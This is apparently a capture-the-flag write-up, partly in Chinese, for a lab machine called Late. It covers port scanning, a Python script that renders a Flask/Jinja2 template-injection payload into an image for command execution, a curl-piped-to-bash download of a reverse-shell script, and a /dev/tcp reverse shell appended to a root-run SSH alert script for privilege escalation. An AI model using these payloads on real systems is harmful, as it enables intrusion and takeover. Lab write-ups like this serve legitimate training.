Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.156 | TCP:22,80 |
$ ip='10.10.11.156'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 025e290ea3af4e729da4fe0dcb5d8307 (RSA)
| 256 41e1fe03a5c797c4d51677f3410ce9fb (ECDSA)
|_ 256 28394698171e461a1ea1ab3b9a577048 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelImage to text with Flask SSTI
# echo '10.10.11.156 late.htb images.late.htb'>>/etc/hosts
https://onlinetexttools.com/convert-text-to-image
上传SSTI载荷
python
from PIL import Image, ImageDraw, ImageFont
import sys
def main():
if len(sys.argv) < 2:
print('Usage: {} <cmd>'.format(sys.argv[0]))
exit()
img = Image.new('RGB', (2000, 100), color=(0, 0, 0))
draw = ImageDraw.Draw(img)
try:
myFont = ImageFont.truetype('LiberationMono-Regular.ttf', 15)
except IOError:
print("Font file not found. Using default font.")
myFont = ImageFont.load_default()
payload = """{{{{
self._TemplateReference__context.namespace.__init__.__globals__.os.popen(
\"{cmd}\").read()
}}}}""".format(cmd=sys.argv[1])
draw.text((0, 3), payload, fill=(255, 255, 255), font=myFont)
img.save('payload.png')
print("Payload image saved as 'payload.png'")
if __name__ == '__main__':
main()$ python3 exp.py 'curl http://10.10.16.33/reverse.sh|bash'
User.txt
97957f521c7524ab8c7d89ab95ef262f
Privilege Escalation:lsattr && ssh login alert
/usr/local/sbin/ssh-alert.sh
这个 ssh-alert.sh 脚本是一个 SSH 登录警报,用于检测 SSH 登录事件并向管理员发送邮件通知。它通常与 PAM (Pluggable Authentication Modules) 结合使用,以便在每次成功的 SSH 登录时自动触发。
查看 ssh-alert.sh 文件的扩展属性
$ lsattr /usr/local/sbin/ssh-alert.sh
只能追加:该文件只能在已有内容的基础上追加
$ echo '/bin/sh -i >& /dev/tcp/10.10.16.33/443 0>&1'>>/usr/local/sbin/ssh-alert.sh
$ ssh svc_acc@10.10.11.156 -i ./id_rsa
Root.txt
3ab5d906b2aa753ace8296d4f46c67f6